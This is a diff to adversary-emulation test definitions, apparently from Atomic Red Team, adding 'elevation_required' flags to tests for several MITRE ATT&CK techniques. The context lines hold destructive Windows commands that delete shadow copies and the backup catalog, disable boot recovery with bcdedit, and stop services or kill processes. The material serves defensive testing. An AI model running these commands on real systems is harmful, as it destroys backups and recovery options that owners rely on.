-18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | hh.exe #{local_chm_file} @@ -36,5 +37,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | hh.exe #{remote_chm_file} diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml index 5a6f1ed409..a0c216cccd 100644 --- a/atomics/T1485/T1485.yaml +++ b/atomics/T1485/T1485.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | vssadmin.exe delete shadows /all /quiet @@ -24,6 +25,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | wbadmin.exe delete catalog -quiet @@ -37,6 +39,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no diff --git a/atomics/T1489/T1489.yaml b/atomics/T1489/T1489.yaml index fcf2b767df..8ff99a8038 100644 --- a/atomics/T1489/T1489.yaml +++ b/atomics/T1489/T1489.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | sc.exe stop #{service_name} @@ -36,6 +37,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | net.exe stop #{service_name} @@ -55,5 +57,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | taskkill.exe /f /im #{process_name} diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml index 171728e1da..3a12008f94 100644 --- a/atomics/T1490/T1490.yaml +++ b/atomics/T1490/T1490.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | vssadmin.exe delete shadows /all /quiet @@ -24,6 +25,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | wmic.exe shadowcopy delete @@ -37,6 +39,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | wbadmin.exe delete catalog -quiet @@ -50,6 +53,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no